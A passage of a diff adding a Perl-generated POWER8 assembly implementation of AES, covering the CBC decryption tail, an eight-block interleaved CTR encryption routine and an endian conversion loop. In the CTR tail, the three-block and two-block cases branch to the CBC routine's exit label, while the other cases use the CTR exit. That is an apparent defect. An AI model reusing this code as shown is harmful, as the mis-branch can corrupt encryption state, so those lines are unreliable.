+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x20,$out
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x30,$out
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x40,$out
+	stvx_u		$out7,$x50,$out
+	addi		$out,$out,0x60
+	b		Lcbc_dec8x_done
+
+.align	5
+Lcbc_dec8x_five:
+	vncipherlast	$out3,$out3,$ivec
+	vncipherlast	$out4,$out4,$in3
+	vncipherlast	$out5,$out5,$in4
+	vncipherlast	$out6,$out6,$in5
+	vncipherlast	$out7,$out7,$in6
+	vmr		$ivec,$in7
+
+	le?vperm	$out3,$out3,$out3,$inpperm
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x00,$out
+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x10,$out
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x20,$out
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x30,$out
+	stvx_u		$out7,$x40,$out
+	addi		$out,$out,0x50
+	b		Lcbc_dec8x_done
+
+.align	5
+Lcbc_dec8x_four:
+	vncipherlast	$out4,$out4,$ivec
+	vncipherlast	$out5,$out5,$in4
+	vncipherlast	$out6,$out6,$in5
+	vncipherlast	$out7,$out7,$in6
+	vmr		$ivec,$in7
+
+	le?vperm	$out4,$out4,$out4,$inpperm
+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x00,$out
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x10,$out
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x20,$out
+	stvx_u		$out7,$x30,$out
+	addi		$out,$out,0x40
+	b		Lcbc_dec8x_done
+
+.align	5
+Lcbc_dec8x_three:
+	vncipherlast	$out5,$out5,$ivec
+	vncipherlast	$out6,$out6,$in5
+	vncipherlast	$out7,$out7,$in6
+	vmr		$ivec,$in7
+
+	le?vperm	$out5,$out5,$out5,$inpperm
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x00,$out
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x10,$out
+	stvx_u		$out7,$x20,$out
+	addi		$out,$out,0x30
+	b		Lcbc_dec8x_done
+
+.align	5
+Lcbc_dec8x_two:
+	vncipherlast	$out6,$out6,$ivec
+	vncipherlast	$out7,$out7,$in6
+	vmr		$ivec,$in7
+
+	le?vperm	$out6,$out6,$out6,$inpperm
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x00,$out
+	stvx_u		$out7,$x10,$out
+	addi		$out,$out,0x20
+	b		Lcbc_dec8x_done
+
+.align	5
+Lcbc_dec8x_one:
+	vncipherlast	$out7,$out7,$ivec
+	vmr		$ivec,$in7
+
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out7,0,$out
+	addi		$out,$out,0x10
+
+Lcbc_dec8x_done:
+	le?vperm	$ivec,$ivec,$ivec,$inpperm
+	stvx_u		$ivec,0,$ivp		# write [unaligned] iv
+
+	li		r10,`$FRAME+15`
+	li		r11,`$FRAME+31`
+	stvx		$inpperm,r10,$sp	# wipe copies of round keys
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+	stvx		$inpperm,r10,$sp
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+	stvx		$inpperm,r10,$sp
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+	stvx		$inpperm,r10,$sp
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+
+	mtspr		256,$vrsave
+	lvx		v20,r10,$sp		# ABI says so
+	addi		r10,r10,32
+	lvx		v21,r11,$sp
+	addi		r11,r11,32
+	lvx		v22,r10,$sp
+	addi		r10,r10,32
+	lvx		v23,r11,$sp
+	addi		r11,r11,32
+	lvx		v24,r10,$sp
+	addi		r10,r10,32
+	lvx		v25,r11,$sp
+	addi		r11,r11,32
+	lvx		v26,r10,$sp
+	addi		r10,r10,32
+	lvx		v27,r11,$sp
+	addi		r11,r11,32
+	lvx		v28,r10,$sp
+	addi		r10,r10,32
+	lvx		v29,r11,$sp
+	addi		r11,r11,32
+	lvx		v30,r10,$sp
+	lvx		v31,r11,$sp
+	$POP		r26,`$FRAME+21*16+0*$SIZE_T`($sp)
+	$POP		r27,`$FRAME+21*16+1*$SIZE_T`($sp)
+	$POP		r28,`$FRAME+21*16+2*$SIZE_T`($sp)
+	$POP		r29,`$FRAME+21*16+3*$SIZE_T`($sp)
+	$POP		r30,`$FRAME+21*16+4*$SIZE_T`($sp)
+	$POP		r31,`$FRAME+21*16+5*$SIZE_T`($sp)
+	addi		$sp,$sp,`$FRAME+21*16+6*$SIZE_T`
+	blr
+	.long		0
+	.byte		0,12,0x04,0,0x80,6,6,0
+	.long		0
+.size	.${prefix}_cbc_encrypt,.-.${prefix}_cbc_encrypt
+___
+}}	}}}
+
+#########################################################################
+{{{	# CTR procedure[s]						#
+my ($inp,$out,$len,$key,$ivp,$x10,$rounds,$idx)=map("r$_",(3..10));
+my ($rndkey0,$rndkey1,$inout,$tmp)=		map("v$_",(0..3));
+my ($ivec,$inptail,$inpperm,$outhead,$outperm,$outmask,$keyperm,$one)=
+						map("v$_",(4..11));
+my $dat=$tmp;
+
+$code.=<<___;
+.globl	.${prefix}_ctr32_encrypt_blocks
+.align	5
+.${prefix}_ctr32_encrypt_blocks:
+	${UCMP}i	$len,1
+	bltlr-
+
+	lis		r0,0xfff0
+	mfspr		$vrsave,256
+	mtspr		256,r0
+
+	li		$idx,15
+	vxor		$rndkey0,$rndkey0,$rndkey0
+	le?vspltisb	$tmp,0x0f
+
+	lvx		$ivec,0,$ivp		# load [unaligned] iv
+	lvsl		$inpperm,0,$ivp
+	lvx		$inptail,$idx,$ivp
+	 vspltisb	$one,1
+	le?vxor		$inpperm,$inpperm,$tmp
+	vperm		$ivec,$ivec,$inptail,$inpperm
+	 vsldoi		$one,$rndkey0,$one,1
+
+	neg		r11,$inp
+	?lvsl		$keyperm,0,$key		# prepare for unaligned key
+	lwz		$rounds,240($key)
+
+	lvsr		$inpperm,0,r11		# prepare for unaligned load
+	lvx		$inptail,0,$inp
+	addi		$inp,$inp,15		# 15 is not typo
+	le?vxor		$inpperm,$inpperm,$tmp
+
+	srwi		$rounds,$rounds,1
+	li		$idx,16
+	subi		$rounds,$rounds,1
+
+	${UCMP}i	$len,8
+	bge		_aesp8_ctr32_encrypt8x
+
+	?lvsr		$outperm,0,$out		# prepare for unaligned store
+	vspltisb	$outmask,-1
+	lvx		$outhead,0,$out
+	?vperm		$outmask,$rndkey0,$outmask,$outperm
+	le?vxor		$outperm,$outperm,$tmp
+
+	lvx		$rndkey0,0,$key
+	mtctr		$rounds
+	lvx		$rndkey1,$idx,$key
+	addi		$idx,$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vxor		$inout,$ivec,$rndkey0
+	lvx		$rndkey0,$idx,$key
+	addi		$idx,$idx,16
+	b		Loop_ctr32_enc
+
+.align	5
+Loop_ctr32_enc:
+	?vperm		$rndkey1,$rndkey1,$rndkey0,$keyperm
+	vcipher		$inout,$inout,$rndkey1
+	lvx		$rndkey1,$idx,$key
+	addi		$idx,$idx,16
+	?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vcipher		$inout,$inout,$rndkey0
+	lvx		$rndkey0,$idx,$key
+	addi		$idx,$idx,16
+	bdnz		Loop_ctr32_enc
+
+	vadduwm		$ivec,$ivec,$one
+	 vmr		$dat,$inptail
+	 lvx		$inptail,0,$inp
+	 addi		$inp,$inp,16
+	 subic.		$len,$len,1		# blocks--
+
+	?vperm		$rndkey1,$rndkey1,$rndkey0,$keyperm
+	vcipher		$inout,$inout,$rndkey1
+	lvx		$rndkey1,$idx,$key
+	 vperm		$dat,$dat,$inptail,$inpperm
+	 li		$idx,16
+	?vperm		$rndkey1,$rndkey0,$rndkey1,$keyperm
+	 lvx		$rndkey0,0,$key
+	vxor		$dat,$dat,$rndkey1	# last round key
+	vcipherlast	$inout,$inout,$dat
+
+	 lvx		$rndkey1,$idx,$key
+	 addi		$idx,$idx,16
+	vperm		$inout,$inout,$inout,$outperm
+	vsel		$dat,$outhead,$inout,$outmask
+	 mtctr		$rounds
+	 ?vperm		$rndkey0,$rndkey0,$rndkey1,$keyperm
+	vmr		$outhead,$inout
+	 vxor		$inout,$ivec,$rndkey0
+	 lvx		$rndkey0,$idx,$key
+	 addi		$idx,$idx,16
+	stvx		$dat,0,$out
+	addi		$out,$out,16
+	bne		Loop_ctr32_enc
+
+	addi		$out,$out,-1
+	lvx		$inout,0,$out		# redundant in aligned case
+	vsel		$inout,$outhead,$inout,$outmask
+	stvx		$inout,0,$out
+
+	mtspr		256,$vrsave
+	blr
+	.long		0
+	.byte		0,12,0x14,0,0,0,6,0
+	.long		0
+___
+#########################################################################
+{{	# Optimized CTR procedure					#
+my $key_="r11";
+my ($x00,$x10,$x20,$x30,$x40,$x50,$x60,$x70)=map("r$_",(0,8,26..31));
+    $x00=0 if ($flavour =~ /osx/);
+my ($in0, $in1, $in2, $in3, $in4, $in5, $in6, $in7 )=map("v$_",(0..3,10,12..14));
+my ($out0,$out1,$out2,$out3,$out4,$out5,$out6,$out7)=map("v$_",(15..22));
+my $rndkey0="v23";	# v24-v25 rotating buffer for first found keys
+			# v26-v31 last 6 round keys
+my ($tmp,$keyperm)=($in3,$in4);	# aliases with "caller", redundant assignment
+my ($two,$three,$four)=($outhead,$outperm,$outmask);
+
+$code.=<<___;
+.align	5
+_aesp8_ctr32_encrypt8x:
+	$STU		$sp,-`($FRAME+21*16+6*$SIZE_T)`($sp)
+	li		r10,`$FRAME+8*16+15`
+	li		r11,`$FRAME+8*16+31`
+	stvx		v20,r10,$sp		# ABI says so
+	addi		r10,r10,32
+	stvx		v21,r11,$sp
+	addi		r11,r11,32
+	stvx		v22,r10,$sp
+	addi		r10,r10,32
+	stvx		v23,r11,$sp
+	addi		r11,r11,32
+	stvx		v24,r10,$sp
+	addi		r10,r10,32
+	stvx		v25,r11,$sp
+	addi		r11,r11,32
+	stvx		v26,r10,$sp
+	addi		r10,r10,32
+	stvx		v27,r11,$sp
+	addi		r11,r11,32
+	stvx		v28,r10,$sp
+	addi		r10,r10,32
+	stvx		v29,r11,$sp
+	addi		r11,r11,32
+	stvx		v30,r10,$sp
+	stvx		v31,r11,$sp
+	li		r0,-1
+	stw		$vrsave,`$FRAME+21*16-4`($sp)	# save vrsave
+	li		$x10,0x10
+	$PUSH		r26,`$FRAME+21*16+0*$SIZE_T`($sp)
+	li		$x20,0x20
+	$PUSH		r27,`$FRAME+21*16+1*$SIZE_T`($sp)
+	li		$x30,0x30
+	$PUSH		r28,`$FRAME+21*16+2*$SIZE_T`($sp)
+	li		$x40,0x40
+	$PUSH		r29,`$FRAME+21*16+3*$SIZE_T`($sp)
+	li		$x50,0x50
+	$PUSH		r30,`$FRAME+21*16+4*$SIZE_T`($sp)
+	li		$x60,0x60
+	$PUSH		r31,`$FRAME+21*16+5*$SIZE_T`($sp)
+	li		$x70,0x70
+	mtspr		256,r0
+
+	subi		$rounds,$rounds,3	# -4 in total
+
+	lvx		$rndkey0,$x00,$key	# load key schedule
+	lvx		v30,$x10,$key
+	addi		$key,$key,0x20
+	lvx		v31,$x00,$key
+	?vperm		$rndkey0,$rndkey0,v30,$keyperm
+	addi		$key_,$sp,$FRAME+15
+	mtctr		$rounds
+
+Load_ctr32_enc_key:
+	?vperm		v24,v30,v31,$keyperm
+	lvx		v30,$x10,$key
+	addi		$key,$key,0x20
+	stvx		v24,$x00,$key_		# off-load round[1]
+	?vperm		v25,v31,v30,$keyperm
+	lvx		v31,$x00,$key
+	stvx		v25,$x10,$key_		# off-load round[2]
+	addi		$key_,$key_,0x20
+	bdnz		Load_ctr32_enc_key
+
+	lvx		v26,$x10,$key
+	?vperm		v24,v30,v31,$keyperm
+	lvx		v27,$x20,$key
+	stvx		v24,$x00,$key_		# off-load round[3]
+	?vperm		v25,v31,v26,$keyperm
+	lvx		v28,$x30,$key
+	stvx		v25,$x10,$key_		# off-load round[4]
+	addi		$key_,$sp,$FRAME+15	# rewind $key_
+	?vperm		v26,v26,v27,$keyperm
+	lvx		v29,$x40,$key
+	?vperm		v27,v27,v28,$keyperm
+	lvx		v30,$x50,$key
+	?vperm		v28,v28,v29,$keyperm
+	lvx		v31,$x60,$key
+	?vperm		v29,v29,v30,$keyperm
+	lvx		$out0,$x70,$key		# borrow $out0
+	?vperm		v30,v30,v31,$keyperm
+	lvx		v24,$x00,$key_		# pre-load round[1]
+	?vperm		v31,v31,$out0,$keyperm
+	lvx		v25,$x10,$key_		# pre-load round[2]
+
+	vadduwm		$two,$one,$one
+	subi		$inp,$inp,15		# undo "caller"
+	$SHL		$len,$len,4
+
+	vadduwm		$out1,$ivec,$one	# counter values ...
+	vadduwm		$out2,$ivec,$two
+	vxor		$out0,$ivec,$rndkey0	# ... xored with rndkey[0]
+	 le?li		$idx,8
+	vadduwm		$out3,$out1,$two
+	vxor		$out1,$out1,$rndkey0
+	 le?lvsl	$inpperm,0,$idx
+	vadduwm		$out4,$out2,$two
+	vxor		$out2,$out2,$rndkey0
+	 le?vspltisb	$tmp,0x0f
+	vadduwm		$out5,$out3,$two
+	vxor		$out3,$out3,$rndkey0
+	 le?vxor	$inpperm,$inpperm,$tmp	# transform for lvx_u/stvx_u
+	vadduwm		$out6,$out4,$two
+	vxor		$out4,$out4,$rndkey0
+	vadduwm		$out7,$out5,$two
+	vxor		$out5,$out5,$rndkey0
+	vadduwm		$ivec,$out6,$two	# next counter value
+	vxor		$out6,$out6,$rndkey0
+	vxor		$out7,$out7,$rndkey0
+
+	mtctr		$rounds
+	b		Loop_ctr32_enc8x
+.align	5
+Loop_ctr32_enc8x:
+	vcipher 	$out0,$out0,v24
+	vcipher 	$out1,$out1,v24
+	vcipher 	$out2,$out2,v24
+	vcipher 	$out3,$out3,v24
+	vcipher 	$out4,$out4,v24
+	vcipher 	$out5,$out5,v24
+	vcipher 	$out6,$out6,v24
+	vcipher 	$out7,$out7,v24
+Loop_ctr32_enc8x_middle:
+	lvx		v24,$x20,$key_		# round[3]
+	addi		$key_,$key_,0x20
+
+	vcipher 	$out0,$out0,v25
+	vcipher 	$out1,$out1,v25
+	vcipher 	$out2,$out2,v25
+	vcipher 	$out3,$out3,v25
+	vcipher 	$out4,$out4,v25
+	vcipher 	$out5,$out5,v25
+	vcipher 	$out6,$out6,v25
+	vcipher 	$out7,$out7,v25
+	lvx		v25,$x10,$key_		# round[4]
+	bdnz		Loop_ctr32_enc8x
+
+	subic		r11,$len,256		# $len-256, borrow $key_
+	vcipher 	$out0,$out0,v24
+	vcipher 	$out1,$out1,v24
+	vcipher 	$out2,$out2,v24
+	vcipher 	$out3,$out3,v24
+	vcipher 	$out4,$out4,v24
+	vcipher 	$out5,$out5,v24
+	vcipher 	$out6,$out6,v24
+	vcipher 	$out7,$out7,v24
+
+	subfe		r0,r0,r0		# borrow?-1:0
+	vcipher 	$out0,$out0,v25
+	vcipher 	$out1,$out1,v25
+	vcipher 	$out2,$out2,v25
+	vcipher 	$out3,$out3,v25
+	vcipher 	$out4,$out4,v25
+	vcipher		$out5,$out5,v25
+	vcipher		$out6,$out6,v25
+	vcipher		$out7,$out7,v25
+
+	and		r0,r0,r11
+	addi		$key_,$sp,$FRAME+15	# rewind $key_
+	vcipher		$out0,$out0,v26
+	vcipher		$out1,$out1,v26
+	vcipher		$out2,$out2,v26
+	vcipher		$out3,$out3,v26
+	vcipher		$out4,$out4,v26
+	vcipher		$out5,$out5,v26
+	vcipher		$out6,$out6,v26
+	vcipher		$out7,$out7,v26
+	lvx		v24,$x00,$key_		# re-pre-load round[1]
+
+	subic		$len,$len,129		# $len-=129
+	vcipher		$out0,$out0,v27
+	addi		$len,$len,1		# $len-=128 really
+	vcipher		$out1,$out1,v27
+	vcipher		$out2,$out2,v27
+	vcipher		$out3,$out3,v27
+	vcipher		$out4,$out4,v27
+	vcipher		$out5,$out5,v27
+	vcipher		$out6,$out6,v27
+	vcipher		$out7,$out7,v27
+	lvx		v25,$x10,$key_		# re-pre-load round[2]
+
+	vcipher		$out0,$out0,v28
+	 lvx_u		$in0,$x00,$inp		# load input
+	vcipher		$out1,$out1,v28
+	 lvx_u		$in1,$x10,$inp
+	vcipher		$out2,$out2,v28
+	 lvx_u		$in2,$x20,$inp
+	vcipher		$out3,$out3,v28
+	 lvx_u		$in3,$x30,$inp
+	vcipher		$out4,$out4,v28
+	 lvx_u		$in4,$x40,$inp
+	vcipher		$out5,$out5,v28
+	 lvx_u		$in5,$x50,$inp
+	vcipher		$out6,$out6,v28
+	 lvx_u		$in6,$x60,$inp
+	vcipher		$out7,$out7,v28
+	 lvx_u		$in7,$x70,$inp
+	 addi		$inp,$inp,0x80
+
+	vcipher		$out0,$out0,v29
+	 le?vperm	$in0,$in0,$in0,$inpperm
+	vcipher		$out1,$out1,v29
+	 le?vperm	$in1,$in1,$in1,$inpperm
+	vcipher		$out2,$out2,v29
+	 le?vperm	$in2,$in2,$in2,$inpperm
+	vcipher		$out3,$out3,v29
+	 le?vperm	$in3,$in3,$in3,$inpperm
+	vcipher		$out4,$out4,v29
+	 le?vperm	$in4,$in4,$in4,$inpperm
+	vcipher		$out5,$out5,v29
+	 le?vperm	$in5,$in5,$in5,$inpperm
+	vcipher		$out6,$out6,v29
+	 le?vperm	$in6,$in6,$in6,$inpperm
+	vcipher		$out7,$out7,v29
+	 le?vperm	$in7,$in7,$in7,$inpperm
+
+	add		$inp,$inp,r0		# $inp is adjusted in such
+						# way that at exit from the
+						# loop inX-in7 are loaded
+						# with last "words"
+	subfe.		r0,r0,r0		# borrow?-1:0
+	vcipher		$out0,$out0,v30
+	 vxor		$in0,$in0,v31		# xor with last round key
+	vcipher		$out1,$out1,v30
+	 vxor		$in1,$in1,v31
+	vcipher		$out2,$out2,v30
+	 vxor		$in2,$in2,v31
+	vcipher		$out3,$out3,v30
+	 vxor		$in3,$in3,v31
+	vcipher		$out4,$out4,v30
+	 vxor		$in4,$in4,v31
+	vcipher		$out5,$out5,v30
+	 vxor		$in5,$in5,v31
+	vcipher		$out6,$out6,v30
+	 vxor		$in6,$in6,v31
+	vcipher		$out7,$out7,v30
+	 vxor		$in7,$in7,v31
+
+	bne		Lctr32_enc8x_break	# did $len-129 borrow?
+
+	vcipherlast	$in0,$out0,$in0
+	vcipherlast	$in1,$out1,$in1
+	 vadduwm	$out1,$ivec,$one	# counter values ...
+	vcipherlast	$in2,$out2,$in2
+	 vadduwm	$out2,$ivec,$two
+	 vxor		$out0,$ivec,$rndkey0	# ... xored with rndkey[0]
+	vcipherlast	$in3,$out3,$in3
+	 vadduwm	$out3,$out1,$two
+	 vxor		$out1,$out1,$rndkey0
+	vcipherlast	$in4,$out4,$in4
+	 vadduwm	$out4,$out2,$two
+	 vxor		$out2,$out2,$rndkey0
+	vcipherlast	$in5,$out5,$in5
+	 vadduwm	$out5,$out3,$two
+	 vxor		$out3,$out3,$rndkey0
+	vcipherlast	$in6,$out6,$in6
+	 vadduwm	$out6,$out4,$two
+	 vxor		$out4,$out4,$rndkey0
+	vcipherlast	$in7,$out7,$in7
+	 vadduwm	$out7,$out5,$two
+	 vxor		$out5,$out5,$rndkey0
+	le?vperm	$in0,$in0,$in0,$inpperm
+	 vadduwm	$ivec,$out6,$two	# next counter value
+	 vxor		$out6,$out6,$rndkey0
+	le?vperm	$in1,$in1,$in1,$inpperm
+	 vxor		$out7,$out7,$rndkey0
+	mtctr		$rounds
+
+	 vcipher	$out0,$out0,v24
+	stvx_u		$in0,$x00,$out
+	le?vperm	$in2,$in2,$in2,$inpperm
+	 vcipher	$out1,$out1,v24
+	stvx_u		$in1,$x10,$out
+	le?vperm	$in3,$in3,$in3,$inpperm
+	 vcipher	$out2,$out2,v24
+	stvx_u		$in2,$x20,$out
+	le?vperm	$in4,$in4,$in4,$inpperm
+	 vcipher	$out3,$out3,v24
+	stvx_u		$in3,$x30,$out
+	le?vperm	$in5,$in5,$in5,$inpperm
+	 vcipher	$out4,$out4,v24
+	stvx_u		$in4,$x40,$out
+	le?vperm	$in6,$in6,$in6,$inpperm
+	 vcipher	$out5,$out5,v24
+	stvx_u		$in5,$x50,$out
+	le?vperm	$in7,$in7,$in7,$inpperm
+	 vcipher	$out6,$out6,v24
+	stvx_u		$in6,$x60,$out
+	 vcipher	$out7,$out7,v24
+	stvx_u		$in7,$x70,$out
+	addi		$out,$out,0x80
+
+	b		Loop_ctr32_enc8x_middle
+
+.align	5
+Lctr32_enc8x_break:
+	cmpwi		$len,-0x60
+	blt		Lctr32_enc8x_one
+	nop
+	beq		Lctr32_enc8x_two
+	cmpwi		$len,-0x40
+	blt		Lctr32_enc8x_three
+	nop
+	beq		Lctr32_enc8x_four
+	cmpwi		$len,-0x20
+	blt		Lctr32_enc8x_five
+	nop
+	beq		Lctr32_enc8x_six
+	cmpwi		$len,0x00
+	blt		Lctr32_enc8x_seven
+
+Lctr32_enc8x_eight:
+	vcipherlast	$out0,$out0,$in0
+	vcipherlast	$out1,$out1,$in1
+	vcipherlast	$out2,$out2,$in2
+	vcipherlast	$out3,$out3,$in3
+	vcipherlast	$out4,$out4,$in4
+	vcipherlast	$out5,$out5,$in5
+	vcipherlast	$out6,$out6,$in6
+	vcipherlast	$out7,$out7,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x10,$out
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x20,$out
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x30,$out
+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x40,$out
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x50,$out
+	le?vperm	$out7,$out7,$out7,$inpperm
+	stvx_u		$out6,$x60,$out
+	stvx_u		$out7,$x70,$out
+	addi		$out,$out,0x80
+	b		Lctr32_enc8x_done
+
+.align	5
+Lctr32_enc8x_seven:
+	vcipherlast	$out0,$out0,$in1
+	vcipherlast	$out1,$out1,$in2
+	vcipherlast	$out2,$out2,$in3
+	vcipherlast	$out3,$out3,$in4
+	vcipherlast	$out4,$out4,$in5
+	vcipherlast	$out5,$out5,$in6
+	vcipherlast	$out6,$out6,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x10,$out
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x20,$out
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x30,$out
+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x40,$out
+	le?vperm	$out6,$out6,$out6,$inpperm
+	stvx_u		$out5,$x50,$out
+	stvx_u		$out6,$x60,$out
+	addi		$out,$out,0x70
+	b		Lctr32_enc8x_done
+
+.align	5
+Lctr32_enc8x_six:
+	vcipherlast	$out0,$out0,$in2
+	vcipherlast	$out1,$out1,$in3
+	vcipherlast	$out2,$out2,$in4
+	vcipherlast	$out3,$out3,$in5
+	vcipherlast	$out4,$out4,$in6
+	vcipherlast	$out5,$out5,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x10,$out
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x20,$out
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x30,$out
+	le?vperm	$out5,$out5,$out5,$inpperm
+	stvx_u		$out4,$x40,$out
+	stvx_u		$out5,$x50,$out
+	addi		$out,$out,0x60
+	b		Lctr32_enc8x_done
+
+.align	5
+Lctr32_enc8x_five:
+	vcipherlast	$out0,$out0,$in3
+	vcipherlast	$out1,$out1,$in4
+	vcipherlast	$out2,$out2,$in5
+	vcipherlast	$out3,$out3,$in6
+	vcipherlast	$out4,$out4,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x10,$out
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x20,$out
+	le?vperm	$out4,$out4,$out4,$inpperm
+	stvx_u		$out3,$x30,$out
+	stvx_u		$out4,$x40,$out
+	addi		$out,$out,0x50
+	b		Lctr32_enc8x_done
+
+.align	5
+Lctr32_enc8x_four:
+	vcipherlast	$out0,$out0,$in4
+	vcipherlast	$out1,$out1,$in5
+	vcipherlast	$out2,$out2,$in6
+	vcipherlast	$out3,$out3,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x10,$out
+	le?vperm	$out3,$out3,$out3,$inpperm
+	stvx_u		$out2,$x20,$out
+	stvx_u		$out3,$x30,$out
+	addi		$out,$out,0x40
+	b		Lctr32_enc8x_done
+
+.align	5
+Lctr32_enc8x_three:
+	vcipherlast	$out0,$out0,$in5
+	vcipherlast	$out1,$out1,$in6
+	vcipherlast	$out2,$out2,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	le?vperm	$out2,$out2,$out2,$inpperm
+	stvx_u		$out1,$x10,$out
+	stvx_u		$out2,$x20,$out
+	addi		$out,$out,0x30
+	b		Lcbc_dec8x_done
+
+.align	5
+Lctr32_enc8x_two:
+	vcipherlast	$out0,$out0,$in6
+	vcipherlast	$out1,$out1,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	le?vperm	$out1,$out1,$out1,$inpperm
+	stvx_u		$out0,$x00,$out
+	stvx_u		$out1,$x10,$out
+	addi		$out,$out,0x20
+	b		Lcbc_dec8x_done
+
+.align	5
+Lctr32_enc8x_one:
+	vcipherlast	$out0,$out0,$in7
+
+	le?vperm	$out0,$out0,$out0,$inpperm
+	stvx_u		$out0,0,$out
+	addi		$out,$out,0x10
+
+Lctr32_enc8x_done:
+	li		r10,`$FRAME+15`
+	li		r11,`$FRAME+31`
+	stvx		$inpperm,r10,$sp	# wipe copies of round keys
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+	stvx		$inpperm,r10,$sp
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+	stvx		$inpperm,r10,$sp
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+	stvx		$inpperm,r10,$sp
+	addi		r10,r10,32
+	stvx		$inpperm,r11,$sp
+	addi		r11,r11,32
+
+	mtspr		256,$vrsave
+	lvx		v20,r10,$sp		# ABI says so
+	addi		r10,r10,32
+	lvx		v21,r11,$sp
+	addi		r11,r11,32
+	lvx		v22,r10,$sp
+	addi		r10,r10,32
+	lvx		v23,r11,$sp
+	addi		r11,r11,32
+	lvx		v24,r10,$sp
+	addi		r10,r10,32
+	lvx		v25,r11,$sp
+	addi		r11,r11,32
+	lvx		v26,r10,$sp
+	addi		r10,r10,32
+	lvx		v27,r11,$sp
+	addi		r11,r11,32
+	lvx		v28,r10,$sp
+	addi		r10,r10,32
+	lvx		v29,r11,$sp
+	addi		r11,r11,32
+	lvx		v30,r10,$sp
+	lvx		v31,r11,$sp
+	$POP		r26,`$FRAME+21*16+0*$SIZE_T`($sp)
+	$POP		r27,`$FRAME+21*16+1*$SIZE_T`($sp)
+	$POP		r28,`$FRAME+21*16+2*$SIZE_T`($sp)
+	$POP		r29,`$FRAME+21*16+3*$SIZE_T`($sp)
+	$POP		r30,`$FRAME+21*16+4*$SIZE_T`($sp)
+	$POP		r31,`$FRAME+21*16+5*$SIZE_T`($sp)
+	addi		$sp,$sp,`$FRAME+21*16+6*$SIZE_T`
+	blr
+	.long		0
+	.byte		0,12,0x04,0,0x80,6,6,0
+	.long		0
+.size	.${prefix}_ctr32_encrypt_blocks,.-.${prefix}_ctr32_encrypt_blocks
+___
+}}	}}}
+
+my $consts=1;
+foreach(split("\n",$code)) {
+        s/\`([^\`]*)\`/eval($1)/geo;
+
+	# constants table endian-specific conversion
+	if ($consts && m/\.(long|byte)\s+(.+)\s+(\?[a-z]*)$/o) {
+	    my $conv=$3;
+	    my @bytes=();
+
+	    # convert to endian-agnostic format
+	    if ($1 eq "long") {
+	      foreach (split(/,\s*/,$2)) {
+		my $l = /^0/?oct:int;
+		push @bytes,($l>>24)&0xff,($l>>16)&0xff,($l>>8)&0xff,$l&0xff;
+	      }
+	    } else {
+		@bytes = map(/^0/?oct:int,split(/,\s*/,$2));
+	    }
+
+	    # little-endian conversion
+	    if ($flavour =~ /le$/o) {
+		SWITCH: for($conv)  {
+		    /\?inv/ && do   { @bytes=map($_^0xf,@bytes); last; };
+		    /\?rev/ && do   { @bytes=reverse(@bytes);    last; }; 
+		}
+	    }
+
